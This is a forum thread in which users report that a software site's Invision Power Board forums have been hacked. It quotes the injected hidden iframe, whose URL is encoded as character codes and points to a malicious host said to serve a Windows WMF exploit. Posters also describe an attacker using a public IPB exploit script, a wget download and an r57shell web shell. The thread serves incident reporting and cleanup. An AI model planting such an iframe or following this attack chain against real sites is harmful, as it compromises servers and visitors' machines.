Have the forums been hacked?

By RaisinCain
in Site & Forum Issues

 Share

Recommended Posts

Collaborator

iascoot

Posted
Posted

its everypage (of the forums) redmark

</head>

<body>

CODE IS HERE

<div id="ipbwrapper">

<script type="text/javascript">

its right near the top,

Link to comment
Share on other sites
Grand Master

jamend

Posted
Posted

And is it just the forums or also the main page?

It's only the forums, not the main page. Anyways, the site should be taken offline until it's fixed, otherwise lots of people will be hacked. Also, and obviously, web pages don't just change themselves...

Link to comment
Share on other sites
Rising Star

callumy

Posted
Posted

Lucky I am on my Mac! God this could be dangerous (I don't even have anti-virus for my non-internet connected laptop - I don't connect it to the internet so n most cases it doesn't matter). There isn't anything at http://zchxsikpgz.biz/. It is just the default Apache filler page! This is really bad. I hope it can be squashed soon.

Cal

Link to comment
Share on other sites
Grand Master

Japlabot

Posted
Posted 

&lt;iframe src=" 104; 116; 116; 112; 58; 47; 47; 122; 99; 104; 120; 115; 105; 107; 112; 103; 122; 46; 98; 105; 122; 47; 100; 108; 47; 97; 100; 118; 53; 52; 51; 46; 112; 104; 112;" width=1 height=1&gt;&lt;/iframe&gt;

When the HTML entities are decoded (" ;"), it is http://zchxsikpgz.biz/dl/adv543.php

Didn't affect Firefox, had to fire up IE7 Beta 3 to see it, and NOD32 stopped it.

Can anyone post a selection of the source because I don't see it

post-38039-1152350653_thumb.jpg

Link to comment
Share on other sites
Collaborator

zipgenius

Posted
Posted

I can confirm: Invision Power Board has been hacked.

That happened also tmy forum at http://forum.wininizio.it

Useful notice for the admins: grep your server for the string "r57shell".

The hacker that attacked our website used this perl script: http://www.milw0rm.com/exploits/1720

The script attacks IPB up to v 2.1.5 but it could be improved to attack 2.1.6 also. The perl script can be locally executed (you just need a Perl environment in your system): it adds a post with a user account specifically added to begin the attack; the script then adds a new post with strange characters and finally it enables a remote shell. The hacker that attacked us placed a WGET command to upload a web shell (r57shell.php) that gives full control over the server, so he was able to modify the index.php file of any web application he found on our server.

post-4032-1152350664_thumb.jpg

Link to comment
Share on other sites
Grand Master

John Veteran

Posted
  • Veteran
Posted

It's gone, but the exploit is still live. Invision needs to release a fix, or a workaround implimented before we can be sure it won't happen again.

Link to comment
Share on other sites
Collaborator

zipgenius

Posted
Posted
So what is this nasty trying to do anyway ?

That code tries to load a remote malfomed .WMF file in order to hit unpatched Windows system.

Link to comment
Share on other sites
Collaborator

zipgenius

Posted
Posted
I can confirm: Invision Power Board has been hacked.

That happened also tmy forum at http://forum.wininizio.it

Useful notice for the admins: grep your server for the string "r57shell".

The hacker that attacked our website used this perl script: http://www.milw0rm.com/exploits/1720

The script attacks IPB up to v 2.1.5 but it could be improved to attack 2.1.6 also. The perl script can be locally executed (you just need a Perl environment in your system): it adds a post with a user account specifically added to begin the attack; the script then adds a new post with strange characters and finally it enables a remote shell. The hacker that attacked us placed a WGET command to upload a web shell (r57shell.php) that gives full control over the server, so he was able to modify the index.php file of any web application he found on our server.

Additional info: this kind of attack uses the Invision folders that need to be chmod 0777 like /uploads or similar.

Link to comment
Share on other sites
Collaborator

zipgenius

Posted
Posted
I wonder if it actually "got" anyone.

I think that someone has been affected: not everybody has applied the WMF patch :(

Link to comment
Share on other sites
This topic is now closed to further replies.
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.